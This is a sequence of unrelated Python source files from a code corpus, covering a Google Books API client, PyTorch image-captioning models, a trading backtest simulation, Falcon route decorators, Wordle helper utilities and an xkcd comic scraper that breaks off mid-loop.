@abstractproperty
def url(self):
"""
Routes to proper destination URL and proper encoding schemes.
:return url: str
"""
return
@abstractmethod
def connect(self):
"""
Makes connection to the backend API and handles any exceptions.
"""
return
@abstractproperty
def reader(self):
"""
Reads content.
:return text: str
"""
return
class GoogleBooksAPIClient(AbstractBaseAPIClient):
"""
Implements the AbstractBaseAPIClient and talks to the google books
api for querying and finding books.
:param title: str
:param author: str
:param max_results: int
:param start_index: int
:param language_code: str
:param fields: tuple
:return self: **GoogleBooksAPIClient**
"""
def __init__(self,
title='',
author='',
max_results=10,
start_index=0,
language_code='',
fields=tuple(),
):
self.title = title
self.author = author
self.max_results = max_results
self.start_index = start_index
self.language_code = language_code
self.fields = fields
@property
def url(self):
base = r'https://www.googleapis.com/books/v1/volumes'
query = r''
if self.title:
query = '"{0}"'.format(':'.join(['intitle', self.title]))
if self.author:
authors = '"{0}"'.format(':'.join(['inauthor', self.author]))
query = '+'.join([query, authors]).strip('+')
# Encode Parameters
params = urlencode({
'q': query,
'startIndex': self.start_index,
'maxResults': self.max_results,
'langRestrict': self.language_code,
})
# Optimizes amount of data requested
fieldstring = 'fields={prefix}({fields})'.format(
prefix='/'.join(['items', 'volumeInfo']),
fields=','.join(('authors', 'title', 'industryIdentifiers', 'publisher', 'publishedDate', 'pageCount',) + self.fields),
)
return '&'.join(['?'.join([base, params]), fieldstring])
@contextmanager
def connect(self, agent='Python'):
"""
Context manager for HTTP Connection state and ensures proper handling
of network sockets, sends a GET request.
Exception is raised at the yield statement.
:yield request: FileIO<Socket>
"""
headers = {'User-Agent': agent}
request = urlopen(Request(self.url, headers=headers))
try:
yield request
finally:
request.close()
@property
def reader(self):
"""
Reads raw text from the connection stream.
Ensures proper exception handling.
:return bytes: request
"""
request_stream = ''
with self.connect() as request:
if request.msg != 'OK':
raise HTTPError
request_stream = request.read().decode('utf-8')
return request_stream
@property
def json(self):
"""
Serializes json text stream into python dictionary.
:return dict: json
"""
_json = json.loads(self.reader)
if _json.get('error', None):
raise HTTPError(_json['error']['errors'])
return _json
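# --- Editor's usage sketch (not part of the original module) ---
# Shows how the client above could be queried; the title/author values are
# arbitrary examples and network access to the Google Books API is assumed.
if __name__ == '__main__':
    client = GoogleBooksAPIClient(title='Dune', author='Frank Herbert', max_results=3)
    print(client.url)  # inspect the generated query URL
    for item in client.json.get('items', []):
        info = item['volumeInfo']
        print(info.get('title'), '-', ', '.join(info.get('authors', [])))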
``` |
{
"source": "joaodinissf/prim-benchmarks",
"score": 4
} |
#### File: baselines/gpu/cpu_lib.py
```python
def binary_search(arr, search):
    L = 0
    R = len(arr) - 1
    while L <= R:
        m = (L + R) // 2  # integer midpoint
        if arr[m] < search:
            L = m + 1
        elif arr[m] > search:
            R = m - 1
        else:
            return m
    return -2  # Error code 2: value not found
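# --- Editor's demo (not part of the original baseline) ---
# Quick self-check of the search over a sorted array; the values are arbitrary.
if __name__ == '__main__':
    data = [1, 3, 5, 7, 9, 11]
    print(binary_search(data, 7))   # expected index: 3
    print(binary_search(data, 4))   # expected: -2 (not found)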
``` |
{
"source": "joaodmrodrigues/elements-financial-machine-learning",
"score": 3
} |
#### File: elements-financial-machine-learning/__writing/script_backtest_statistics_part1.py
```python
import yfinance as yf
sp500 = yf.Ticker("^GSPC")
data = sp500.history(period="10y", interval="1d")
import matplotlib.pyplot as plt
selected_data = data[data.index>="2015-01-01"]
selected_data = selected_data[selected_data.index<="2020-12-31"]
returns = selected_data["Close"].pct_change().to_numpy()[1:]
N = len(returns)
import numpy as np
n_profit = int(0.51*N)
n_loss = N-n_profit
aux = np.array([1]*n_profit + [-1]*n_loss)
hit = np.random.permutation(aux)
strategy_returns = np.abs(returns) * hit
# Portfolio growth
portfolio_growth = 1+np.cumsum(strategy_returns)
# Plot
#fig, axes = plt.subplots(1, 2, figsize=(10, 4))
#axes[0].plot(selected_data["Close"], color=(0.8,0.5,0.5,1.0))
#axes[0].set_xlabel("Date")
#axes[0].set_ylabel("SP500")
#axes[1].plot(portfolio_growth, color=(0.5,0.5,0.8,1.0))
#axes[1].set_xlabel("Date")
#axes[1].set_ylabel("Portfolio value")
#plt.show()
# Metrics
total_return = np.sum(strategy_returns)
sharp_ratio = np.sqrt(252)*np.mean(strategy_returns)/np.std(strategy_returns)
print("Strategy total return =", np.round(total_return, 2))
print("Strategy Sharp ratio =", np.round(sharp_ratio, 2))
##### Monte Carlo
def calculate_performance_realizations(returns, hit_ratio, backtest_length, n_realizations):
realizations = list()
total_returns = list()
sharp_ratios = list()
N = len(returns)
n_profit = int(hit_ratio*N)
n_loss = N-n_profit
aux = np.array([1]*n_profit + [-1]*n_loss)
for i in range(0, n_realizations):
hit = np.random.permutation(aux)
strategy_returns = np.abs(returns)*hit
strategy_returns = np.random.permutation(strategy_returns)[0:backtest_length]
realizations.append(strategy_returns)
total_returns.append(np.sum(strategy_returns))
sharp_ratios.append(np.sqrt(252)*np.mean(strategy_returns)/np.std(strategy_returns))
return (np.array(realizations), np.array(total_returns), np.array(sharp_ratios))
(realizations, total_returns, sharp_ratios) = calculate_performance_realizations(returns=returns, hit_ratio=0.50, backtest_length=252, n_realizations=10000)
percentage_profitable = np.sum(total_returns>=0)/len(total_returns)
print(percentage_profitable)
## Sharpe ratio statistics
pdf, bins, patches = plt.hist(x=sharp_ratios, bins=int(len(sharp_ratios)**(1/3)), density=True)
pdf = pdf / np.sum(pdf)
cmf = np.cumsum(pdf)
fig, axes = plt.subplots(1, 1, figsize=(5, 4))
axes.plot(bins[0:-1], 1-cmf, color=(0.8,0.5,0.5,1.0))
axes.set_xlabel("Sharp ratio")
axes.set_ylabel("1-Cumulative mass function")
#axes.set_yscale("log")
plt.show()
#### Case
case_index = np.argsort(sharp_ratios)[-3]
case_realization = realizations[case_index, :]
portfolio_growth = 1+np.cumsum(case_realization)
plt.plot(portfolio_growth)
plt.show()
raise SystemExit  # intentional early stop before the (slow) surface-plot sweep below
###### Surface plot
hit_ratios = np.linspace(0.5, 0.6, 10)
backtest_lengths = np.arange(50, 252, 10)
ratio_profitable_strategies = list()
for hit_ratio in hit_ratios:
print(hit_ratio)
aux = list()
for backtest_length in backtest_lengths:
(realizations, total_returns, sharp_ratios) = calculate_performance_realizations(returns=returns, hit_ratio=hit_ratio, backtest_length=backtest_length, n_realizations=1000)
percentage_profitable = np.sum(total_returns>=0)/len(total_returns)
aux.append(percentage_profitable)
ratio_profitable_strategies.append(aux)
ratio_profitable_strategies = np.array(ratio_profitable_strategies).T
### Plot
fig, axes = plt.subplots(1, 1, figsize=(5, 4))
# handle for displaying the colorbar
Z = [[0,0],[0,0]]
levels = np.linspace(hit_ratios[0], hit_ratios[-1], 40)
# color options
colormap_set = 'coolwarm'
from matplotlib import cm
colormap = cm.ScalarMappable(norm=None, cmap=colormap_set)
colormap.set_clim(vmin=np.min(hit_ratios), vmax=np.max(hit_ratios))
dummy = axes.contourf(Z, levels, cmap=colormap_set)
axes.cla()
cbar = plt.colorbar(dummy, format='%.2f')
cbar.set_label("Hit ratio", rotation=90)
##### data plotting
for i in range(0, len(hit_ratios)):
rgb_code = colormap.to_rgba(x=hit_ratios[i], alpha=0.999, bytes=False, norm=True)
axes.plot(backtest_lengths, ratio_profitable_strategies[:,i], color=rgb_code, linewidth=1.5, alpha=0.3)
plt.show()
``` |
{
"source": "joaodobread/python-falcon-api",
"score": 3
} |
#### File: common/decorators/roles.py
```python
import functools
def Roles(*roles: str):
"""add roles to class. with roles can be blocked user without access"""
def wrapper(original_class):
orig_init = original_class.__init__
@functools.wraps(original_class)
def __init__(self, *args, **kws):
self.falcon_security__roles = [*roles]
self.falcon_security__unprotected = False
orig_init(self, *args, **kws)
original_class.__init__ = __init__
return original_class
return wrapper
```
#### File: common/decorators/unprotected.py
```python
import functools
def Unprotected():
"""add unprotected attribute to route"""
def wrapper(original_class):
orig_init = original_class.__init__
@functools.wraps(original_class)
def __init__(self, *args, **kws):
self.falcon_security__roles = []
self.falcon_security__unprotected = True
orig_init(self, *args, **kws)
original_class.__init__ = __init__
return original_class
return wrapper
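# --- Editor's usage sketch (not part of the original file) ---
# Shows how the decorator is meant to be applied to a Falcon resource; the
# resource class below is hypothetical.
@Unprotected()
class HealthCheckResource:
    def on_get(self, req, resp):
        resp.media = {"status": "ok"}

# An auth middleware could then skip protected checks with something like:
#   if getattr(resource, 'falcon_security__unprotected', False): return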
``` |
{
"source": "joao-d-oliveira/CV-Image_Captioning",
"score": 3
} |
#### File: joao-d-oliveira/CV-Image_Captioning/model.py
```python
import torch
import torch.nn as nn
import torchvision.models as models
import torch.nn.functional as F
class EncoderCNN(nn.Module):
def __init__(self, embed_size):
super(EncoderCNN, self).__init__()
resnet = models.resnet50(pretrained=True)
for param in resnet.parameters():
param.requires_grad_(False)
modules = list(resnet.children())[:-1]
self.resnet = nn.Sequential(*modules)
self.embed = nn.Linear(resnet.fc.in_features, embed_size)
def forward(self, images):
features = self.resnet(images)
features = features.view(features.size(0), -1)
features = self.embed(features)
return features
###
# Added for comparison of results.
# Taken from the tutorial at:
# https://medium.com/analytics-vidhya/image-captioning-with-attention-part-1-e8a5f783f6d3
###
class EncoderCNNv1(nn.Module):
def __init__(self, embed_size):
super(EncoderCNNv1, self).__init__()
resnet = models.resnet50(pretrained=True)
for param in resnet.parameters():
param.requires_grad_(False)
modules = list(resnet.children())[:-1]
self.resnet = nn.Sequential(*modules)
self.embed = nn.Linear(resnet.fc.in_features, embed_size)
def forward(self, images):
features = self.resnet(images)
# first, we need to resize the tensor to be
# (batch, size*size, feature_maps)
batch, feature_maps, size_1, size_2 = features.size()
features = features.permute(0, 2, 3, 1)
features = features.view(batch, size_1*size_2, feature_maps)
return features
# Simplest Decoder
class DecoderRNNv101(nn.Module):
def __init__(self, embed_size, hidden_size, vocab_size, num_layers=1):
super().__init__()
self.hidden_size = hidden_size
self.embed_size = embed_size
self.vocab_size = vocab_size
self.num_layers = num_layers
# Embedding Layer: transform captions into embeded_size
self.embedding = nn.Embedding(vocab_size, embed_size)
# LSTM Layer: Do the magic of finding the next word
self.lstm = nn.LSTM(embed_size, hidden_size, num_layers, batch_first = True)
# convert output from LSTM into predictions for each word in vocab
self.linear = nn.Linear(hidden_size, vocab_size)
def forward(self, features, captions):
embed = self.embedding(captions)
embed = torch.cat((features.unsqueeze(1), embed), dim = 1)
# Initialize the hidden state
batch_size = features.shape[0]
lstm_outputs, _ = self.lstm(embed, self.init_hidden(batch_size))
out = self.linear(lstm_outputs)
return out
def sample(self, features, states=None, end_word = 1, max_len=20):
output_ids = []
inputs = features.unsqueeze(1)
for i in range(max_len):
# pass data through recurrent network
hiddens, states = self.lstm(inputs, states)
outputs = self.linear(hiddens.squeeze(1))
# find maximal predictions
predicted = outputs.max(1)[1]
# append results from given step to global results
output_ids.append(predicted.cpu().numpy()[0].item())
# prepare chosen words for next decoding step
inputs = self.embedding(predicted)
inputs = inputs.unsqueeze(1)
# arrived to the end of the sentence
if predicted == end_word : break
return output_ids
# taken from the previous lesson
def init_hidden(self, batch_size):
""" At the start of training, we need to initialize a hidden state;
there will be none because the hidden state is formed based on previously seen data.
So, this function defines a hidden state with all zeroes
The axes semantics are (num_layers, batch_size, hidden_dim)
"""
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
return (torch.zeros((1, batch_size, self.hidden_size), device=device), \
torch.zeros((1, batch_size, self.hidden_size), device=device))
# Slightly more complex than v101 with a Linear layer as states from LSTM
# proved that performs better
class DecoderRNNv102(nn.Module):
def __init__(self, embed_size, hidden_size, vocab_size, num_layers=1):
super().__init__()
self.hidden_size = hidden_size
self.embed_size = embed_size
self.vocab_size = vocab_size
self.num_layers = num_layers
# Embedding Layer: transform captions into embeded_size
self.embedding = nn.Embedding(vocab_size, embed_size)
# LSTM Layer: Do the magic of finding the next word
self.lstm_hc = (nn.Linear(self.embed_size, self.hidden_size), nn.Linear(self.embed_size, self.hidden_size))
self.lstm = nn.LSTM(embed_size, hidden_size, num_layers, batch_first = True)
# convert output from LSTM into predictions for each word in vocab
self.linear = nn.Linear(hidden_size, vocab_size)
def forward(self, features, captions):
embed = self.embedding(captions)
embed = torch.cat((features.unsqueeze(1), embed), dim = 1)
# Initialize the hidden state
self.lstm_hc = self.init_hd_hidden(self.lstm_hc[0], self.lstm_hc[1], features)
lstm_outputs, self.lstm_hc = self.lstm(embed, self.lstm_hc)
out = self.linear(lstm_outputs)
return out
def sample(self, inputs, hidden=None, end_word = 1, max_len=20):
" accepts pre-processed image tensor (inputs) and returns predicted sentence (list of tensor ids of length max_len) "
output = []
# Either get hidden states already from pretrained or initialize
if hidden is None:
batch_size = inputs.shape[0]
hidden = self.init_hidden(batch_size)
while True:
lstm_out, hidden = self.lstm(inputs, hidden)
outputs = self.linear(lstm_out)
outputs = outputs.squeeze(1)
# get the word with the best ranking
_, found_word = torch.max(outputs, dim=1)
# save new word
output.append(found_word.cpu().numpy()[0].item()) # storing the word predicted
# In case new word is the end of the sentence... end the sampling
if found_word == end_word or len(output) > max_len: break
# embed the last predicted word to predict next
inputs = self.embedding(found_word)
inputs = inputs.unsqueeze(1)
return output
def init_hd_hidden(self, h, c, features):
if torch.cuda.is_available(): h = h.cuda(); c = c.cuda()
h = h(features).unsqueeze(0)
c = c(features).unsqueeze(0)
return h, c
def init_hidden(self, batch_size):
""" At the start of training, we need to initialize a hidden state;
there will be none because the hidden state is formed based on previously seen data.
So, this function defines a hidden state with all zeroes
The axes semantics are (num_layers, batch_size, hidden_dim)
"""
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
return (torch.zeros((1, batch_size, self.hidden_size), device=device), \
torch.zeros((1, batch_size, self.hidden_size), device=device))
# Added a MultiHeadAttention Layer after the LSTM, trying to focus the attention after LSTM
# Then performing the operations with EMB -> LSTM -> Attention -> Linear
class DecoderRNNv120(nn.Module):
def __init__(self, embed_size, hidden_size, vocab_size, num_layers=1, num_heads=8):
super().__init__()
self.hidden_size = hidden_size
self.embed_size = embed_size
self.vocab_size = vocab_size
self.num_layers = num_layers
self.num_heads = num_heads
# Embedding Layer: transform captions into embeded_size
self.embedding = nn.Embedding(vocab_size, embed_size)
# Get the focus from features where it should
self.attention = nn.MultiheadAttention(hidden_size, num_heads)
# LSTM Layer: Do the magic of finding the next word
self.lstm_hc = (nn.Linear(self.embed_size, self.hidden_size), nn.Linear(self.embed_size, self.hidden_size))
self.lstm = nn.LSTM(embed_size, hidden_size, num_layers, batch_first = True)
# convert output from LSTM into predictions for each word in vocab
self.linear = nn.Linear(hidden_size, vocab_size)
def forward(self, features, captions):
embed = self.embedding(captions)
embed = torch.cat((features.unsqueeze(1), embed), dim = 1)
# Initialize the hidden state
self.lstm_hc = self.init_hd_hidden(self.lstm_hc[0], self.lstm_hc[1], features)
lstm_outputs, self.lstm_hc = self.lstm(embed, self.lstm_hc)
att_out, _ = self.attention(lstm_outputs, lstm_outputs, lstm_outputs)
out = self.linear(att_out)
return out
def sample(self, inputs, hidden=None, end_word = 1, max_len=20):
" accepts pre-processed image tensor (inputs) and returns predicted sentence (list of tensor ids of length max_len) "
output = []
if hidden is None:
batch_size = inputs.shape[0]
hidden = self.init_hidden(batch_size)
while True:
lstm_out, hidden = self.lstm(inputs, hidden)
outputs, _ = self.attention(lstm_out, lstm_out, lstm_out)
outputs = self.linear(outputs)
outputs = outputs.squeeze(1)
# get the word with the best ranking
_, max_indice = torch.max(outputs, dim=1)
# save new word
output.append(max_indice.cpu().numpy()[0].item()) # storing the word predicted
# In case new word is the end of the sentence... end the sampling
if max_indice == end_word or len(output) > max_len: break
# embed the last predicted word to predict next
inputs = self.embedding(max_indice)
inputs = inputs.unsqueeze(1)
return output
def init_hd_hidden(self, h, c, features):
if torch.cuda.is_available(): h = h.cuda(); c = c.cuda()
h = h(features).unsqueeze(0)
c = c(features).unsqueeze(0)
return h, c
def init_hidden(self, batch_size):
""" At the start of training, we need to initialize a hidden state;
there will be none because the hidden state is formed based on previously seen data.
So, this function defines a hidden state with all zeroes
The axes semantics are (num_layers, batch_size, hidden_dim)
"""
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
return (torch.zeros((1, batch_size, self.hidden_size), device=device), \
torch.zeros((1, batch_size, self.hidden_size), device=device))
# Added a MultiHeadAttention Layer before, trying to focus the attention first at features
# It actually performs better than the v120
# Then performing the operations with EMB -> Attention -> LSTM -> Linear
class DecoderRNNv121(nn.Module):
def __init__(self, embed_size, hidden_size, vocab_size, num_layers=1, num_heads=8):
super().__init__()
self.hidden_size = hidden_size
self.embed_size = embed_size
self.vocab_size = vocab_size
self.num_layers = num_layers
self.num_heads = num_heads
# Embedding Layer: transform captions into embeded_size
self.embedding = nn.Embedding(vocab_size, embed_size)
# Get the focus from features where it should
self.attention = nn.MultiheadAttention(embed_size, num_heads)
# LSTM Layer: Do the magic of finding the next word
self.lstm_hc = (nn.Linear(self.embed_size, self.hidden_size), nn.Linear(self.embed_size, self.hidden_size))
self.lstm = nn.LSTM(embed_size, hidden_size, num_layers, batch_first = True)
# convert output from LSTM into predictions for each word in vocab
self.linear = nn.Linear(hidden_size, vocab_size)
def forward(self, features, captions):
embed = self.embedding(captions)
embed = torch.cat((features.unsqueeze(1), embed), dim = 1)
# Initialize the hidden state
self.lstm_hc = self.init_hd_hidden(self.lstm_hc[0], self.lstm_hc[1], features)
lstm_outputs, self.lstm_hc = self.lstm(embed, self.lstm_hc)
att_out, _ = self.attention(lstm_outputs, lstm_outputs, lstm_outputs)
out = self.linear(att_out)
return out
def sample(self, inputs, hidden=None, end_word = 1, max_len=20):
" accepts pre-processed image tensor (inputs) and returns predicted sentence (list of tensor ids of length max_len) "
output = []
if hidden is None:
batch_size = inputs.shape[0]
hidden = self.init_hidden(batch_size)
while True:
outputs, _ = self.attention(inputs, inputs, inputs)
outputs, hidden = self.lstm(outputs, hidden)
outputs = self.linear(outputs)
outputs = outputs.squeeze(1)
_, found_word = torch.max(outputs, dim=1) # predict the most likely next word, found_word shape : (1)
# save new word
output.append(found_word.cpu().numpy()[0].item())
# In case new word is the end of the sentence... end the sampling
if found_word == end_word or len(output) > max_len: break
# embed the last predicted word to predict next
inputs = self.embedding(found_word)
inputs = inputs.unsqueeze(1)
return output
def init_hd_hidden(self, h, c, features):
if torch.cuda.is_available(): h = h.cuda(); c = c.cuda()
h = h(features).unsqueeze(0)
c = c(features).unsqueeze(0)
return h, c
def init_hidden(self, batch_size):
""" At the start of training, we need to initialize a hidden state;
there will be none because the hidden state is formed based on previously seen data.
So, this function defines a hidden state with all zeroes
The axes semantics are (num_layers, batch_size, hidden_dim)
"""
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
return (torch.zeros((1, batch_size, self.hidden_size), device=device), \
torch.zeros((1, batch_size, self.hidden_size), device=device))
###
# Added for comparasitation of results.
# Taken from the tutorial at:
# https://medium.com/analytics-vidhya/image-captioning-with-attention-part-1-e8a5f783f6d3
###
class BahdanauAttention(nn.Module):
""" Class performs Additive Bahdanau Attention.
Source: https://arxiv.org/pdf/1409.0473.pdf
"""
def __init__(self, num_features, hidden_dim, output_dim = 1):
super(BahdanauAttention, self).__init__()
self.num_features = num_features
self.hidden_dim = hidden_dim
self.output_dim = output_dim
# fully-connected layer to learn first weight matrix Wa
self.W_a = nn.Linear(self.num_features, self.hidden_dim)
# fully-connected layer to learn the second weight matrix Ua
self.U_a = nn.Linear(self.hidden_dim, self.hidden_dim)
# fully-connected layer to produce score (output), learning weight matrix va
self.v_a = nn.Linear(self.hidden_dim, self.output_dim)
def forward(self, features, decoder_hidden):
"""
Arguments:
----------
- features - features returned from Encoder
- decoder_hidden - hidden state output from Decoder
Returns:
---------
- context - context vector with a size of (1,2048)
- atten_weight - probabilities, express the feature relevance
"""
# add additional dimension to a hidden (required for summation)
decoder_hidden = decoder_hidden.unsqueeze(1)
atten_1 = self.W_a(features)
atten_2 = self.U_a(decoder_hidden)
# apply tangent to combine result from 2 fc layers
atten_tan = torch.tanh(atten_1+atten_2)
atten_score = self.v_a(atten_tan)
atten_weight = F.softmax(atten_score, dim = 1)
# first, we will multiply each vector by its softmax score
# next, we will sum up this vectors, producing the attention context vector
# the size of context equals to a number of feature maps
context = torch.sum(atten_weight * features, dim = 1)
atten_weight = atten_weight.squeeze(dim=2)
return context, atten_weight
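# --- Editor's illustration (not part of the original model code) ---
# Minimal shape check for the attention module above; the 49 x 2048 feature grid
# matches what EncoderCNNv1 produces for a 224x224 image with ResNet-50, and
# hidden_dim=512 mirrors the decoder below. Call it manually if needed.
def _attention_shape_demo():
    attn = BahdanauAttention(num_features=2048, hidden_dim=512)
    features = torch.randn(1, 49, 2048)   # (batch, num_pixels, feature_maps)
    hidden = torch.randn(1, 512)          # decoder hidden state
    context, weights = attn(features, hidden)
    # context: torch.Size([1, 2048]); weights: torch.Size([1, 49])
    return context.shape, weights.shape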
###
# Added for comparison of results.
# Taken from the tutorial at:
# https://medium.com/analytics-vidhya/image-captioning-with-attention-part-1-e8a5f783f6d3
###
class DecoderRNNv200(nn.Module):
"""Attributes:
- embedding_dim - specified size of embeddings;
- hidden_dim - the size of RNN layer (number of hidden states)
- vocab_size - size of vocabulary
- p - dropout probability
"""
def __init__(self, num_features, embedding_dim, hidden_dim, vocab_size, p =0.5):
super(DecoderRNNv200, self).__init__()
self.num_features = num_features
self.embedding_dim = embedding_dim
self.hidden_dim = hidden_dim
self.vocab_size = vocab_size
# scale the inputs to softmax
self.sample_temp = 0.5
# embedding layer that turns words into a vector of a specified size
self.embeddings = nn.Embedding(vocab_size, embedding_dim)
# LSTM will have a single layer of size 512 (512 hidden units)
# it will input concatinated context vector (produced by attention)
# and corresponding hidden state of Decoder
self.lstm = nn.LSTMCell(embedding_dim + num_features, hidden_dim)
# produce the final output
self.fc = nn.Linear(hidden_dim, vocab_size)
# add attention layer
self.attention = BahdanauAttention(num_features, hidden_dim)
# dropout layer
self.drop = nn.Dropout(p=p)
# add initialization fully-connected layers
# initialize hidden state and cell memory using average feature vector
# Source: https://arxiv.org/pdf/1502.03044.pdf
self.init_h = nn.Linear(num_features, hidden_dim)
self.init_c = nn.Linear(num_features, hidden_dim)
def forward(self, captions, features, sample_prob = 0.0):
import numpy as np
embed = self.embeddings(captions)
h, c = self.init_hidden(features)
seq_len = captions.size(1)
feature_size = features.size(1)
batch_size = features.size(0)
# these tensors will store the outputs from lstm cell and attention weights
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
outputs = torch.zeros(batch_size, seq_len, self.vocab_size).to(device)
atten_weights = torch.zeros(batch_size, seq_len, feature_size).to(device)
# scheduled sampling for training
# we do not use it at the first timestep (<start> word)
# but later we check if the probability is bigger than random
for t in range(seq_len):
sample_prob = 0.0 if t == 0 else 0.5
use_sampling = np.random.random() < sample_prob
if use_sampling == False:
word_embed = embed[:,t,:]
context, atten_weight = self.attention(features, h)
# input_concat shape at time step t = (batch, embedding_dim + hidden_dim)
input_concat = torch.cat([word_embed, context], 1)
h, c = self.lstm(input_concat, (h,c))
h = self.drop(h)
output = self.fc(h)
if use_sampling == True:
# use sampling temperature to amplify the values before applying softmax
scaled_output = output / self.sample_temp
scoring = F.log_softmax(scaled_output, dim=1)
top_idx = scoring.topk(1)[1]
word_embed = self.embeddings(top_idx).squeeze(1)
outputs[:, t, :] = output
#atten_weights[:, t, :] = atten_weights
return outputs, atten_weights
def init_hidden(self, features):
"""Initializes hidden state and cell memory using average feature vector.
Arguments:
----------
- features - features returned from Encoder
Retruns:
----------
- h0 - initial hidden state (short-term memory)
- c0 - initial cell state (long-term memory)
"""
mean_annotations = torch.mean(features, dim = 1)
h0 = self.init_h(mean_annotations)
c0 = self.init_c(mean_annotations)
return h0, c0
def sample(self, features, max_sentence = 20):
"""Greedy search to sample top candidate from distribution.
Arguments
----------
- features - features returned from Encoder
- max_sentence - max number of token per caption (default=20)
Returns:
----------
- sentence - list of tokens
"""
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
sentence = []
weights = []
input_word = torch.tensor(0).unsqueeze(0).to(device)
h, c = self.init_hidden(features)
while True:
embedded_word = self.embeddings(input_word)
context, atten_weight = self.attention(features, h)
# input_concat shape at time step t = (batch, embedding_dim + context size)
input_concat = torch.cat([embedded_word, context], dim = 1)
h, c = self.lstm(input_concat, (h,c))
h = self.drop(h)
output = self.fc(h)
scoring = F.log_softmax(output, dim=1)
top_idx = scoring[0].topk(1)[1]
sentence.append(top_idx.item())
weights.append(atten_weight)
input_word = top_idx
if (len(sentence) >= max_sentence or top_idx == 1):
break
return sentence, weights
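# --- Editor's wiring sketch (not part of the original file) ---
# Illustrates how the attention encoder/decoder pair above could be combined on
# one image; vocab/embedding/hidden sizes are illustrative assumptions, no
# trained weights are loaded, and the first run downloads ResNet-50 weights.
if __name__ == '__main__':
    device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
    encoder = EncoderCNNv1(embed_size=256).to(device).eval()
    decoder = DecoderRNNv200(num_features=2048, embedding_dim=256,
                             hidden_dim=512, vocab_size=1000).to(device).eval()
    image = torch.randn(1, 3, 224, 224, device=device)  # one normalised RGB image
    with torch.no_grad():
        features = encoder(image)                        # (1, 49, 2048)
        tokens, _ = decoder.sample(features, max_sentence=5)
    print(tokens)                                        # predicted word ids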
``` |
{
"source": "joao-d-oliveira/wordle_solver",
"score": 3
} |
#### File: wordle_solver/utils/util_helper.py
```python
def process_params(param, default, all_args):
value = default
if param in all_args:
sub_val = all_args[all_args.find(param) + len(param):]
sub_val = sub_val[:sub_val.find('--') if '--' in sub_val else len(sub_val)].strip()
# SPECIFIC APP cases (try to avoid)
if param == '--game':
if '[' in sub_val: sub_val = sub_val[1:-1]
value = []
for e in sub_val.split(','):
if e.count('-') == 1:
fr_, to_ = int(e.split('-')[0].strip()), int(e.split('-')[1].strip())
value += list(range(fr_, to_ + 1))
elif e.count('-') == 2:
import datetime
value.append(datetime.datetime.strptime(e.strip(), '%Y-%m-%d'))
elif e.count('-') == 0:
value.append(int(e))
return value
if type(value) == bool:
assert sub_val in ['True', 'False'], f'error in param: {param} should be True or False'
value = True if sub_val == 'True' else False
elif type(value) == int:
value = int(sub_val)
elif type(value) == list:
# remove parenteses
sub_val = sub_val[1:-1]
if '[' not in sub_val: sub_val = [a.strip() for a in sub_val.split(',')]
else: sub_val = [[int(b) for b in a.replace('[','').replace(']','').split(',')] for a in sub_val.replace(' ','').split('],[')]
value = sub_val
else:
value = sub_val.replace("'", '')
return value
def print_colored(word_try, results):
W = '\033[0m' # white (normal)
R = '\033[31m' # red
G = '\033[32m' # green
O = '\033[33m' # orange
dict_color = {1: G, 0: O, -1:R}
print('tried: ', end='')
for l, c in zip(word_try, results):
print(f"{dict_color[c]}{l}{dict_color[c]}", end='')
print(f"{W}")
def print_time(start, stop):
duration = stop - start
h = int(duration // (60 * 60))
duration -= h * (60 * 60)
m = int(duration // 60)
duration -= m * 60
s = int(duration)
duration -= s
ms = f"{duration:.2f}".split('.')[-1]
return f"{str(h).zfill(2)}:{str(m).zfill(2)}:{str(s).zfill(2):}.{ms}"
```
#### File: wordle_solver/utils/wordle_algo.py
```python
def solve_worldle(date_of_challenge):
import datetime
Ma = open('corpus/wordle_av.txt', 'r').read().split('\n')
Ga = datetime.datetime(2021, 6, 19, 0, 0, 0, 0).replace(hour=0, minute=0, second=0, microsecond=0)
date_of_challenge_ = date_of_challenge.replace(hour=0, minute=0, second=0, microsecond=0)
diff = date_of_challenge_ - Ga
pos_ = int(round(diff.total_seconds() * 1000 / 864e5))
pos = pos_ % len(Ma)
return Ma[pos]
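# --- Editor's usage sketch (not part of the original module) ---
# The daily answer is just a date-derived index into the word list; the date
# below is an arbitrary example and corpus/wordle_av.txt must be present.
if __name__ == '__main__':
    import datetime
    print(solve_worldle(datetime.datetime(2022, 2, 14)))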
``` |
{
"source": "joaoDragado/web_scraping",
"score": 4
} |
#### File: web_scraping/xkcd/multi_thread_xkcd.py
```python
''' ## Implementation ##
1. Download pages with the requests module.
2. Find the URL of the comic image for a page using Beautiful Soup.
3. Download & save comic image locally with iter_content() .
4. Find the URL of the Previous Comic link, and repeat.
'''
''' ## Targeted HTML elements ##
1a. The URL of the comic’s image file is in the src attribute of an <img> element.
1b. The <img> element is inside a <div id="comic"> element.
2. The Prev button has a rel HTML attribute with value=prev .
3. The 1st comic’s Prev button links to the http://xkcd.com/# URL, indicating that there are no more previous pages.
'''
import requests, os, bs4, threading
# starting url
base_url = 'http://xkcd.com'
# store comics in /xkcd ; exist_ok param since py3.2
os.makedirs('xkcd', exist_ok=True)

def download_comics(start_page, end_page):
    for page in range(start_page, end_page):
        # 1. Download the page.
        page_url = '{}/{}'.format(base_url, page)
        print('Downloading page {}...'.format(page_url))
        r = requests.get(page_url)
        try:
            r.raise_for_status()
        except Exception as exc:
            print('There was a problem : {}'.format(exc))
            continue
        # create BeautifulSoup object, store web page
        soup = bs4.BeautifulSoup(r.text, 'html.parser')
        # 2. Find the URL of the comic image.
        comic_elem = soup.select('#comic img')
        if comic_elem == []:
            print('Could not find image element.')
        else:
            # the src is protocol-relative (//imgs.xkcd.com/...), so add a scheme
            comic_url = 'https:' + comic_elem[0].get('src')
            # 3a. Download the image.
            print('Downloading image {}'.format(comic_url))
            r = requests.get(comic_url)
            try:
                r.raise_for_status()
            except Exception as exc:
                print('There was a problem : {}'.format(exc))
                continue
            # 3b. Save the image to ./xkcd
            with open(os.path.join('xkcd', os.path.basename(comic_url)), 'wb') as image_file:
                for tranche in r.iter_content(10000):
                    image_file.write(tranche)

# Create and start the Thread objects.
# (the page ranges below are an editorial assumption: 14 workers, 100 pages each)
download_threads = []
for i in range(0, 1400, 100):
    t = threading.Thread(target=download_comics, args=(i + 1, i + 101))
    download_threads.append(t)
    t.start()
# Wait for all threads to end.
for t in download_threads:
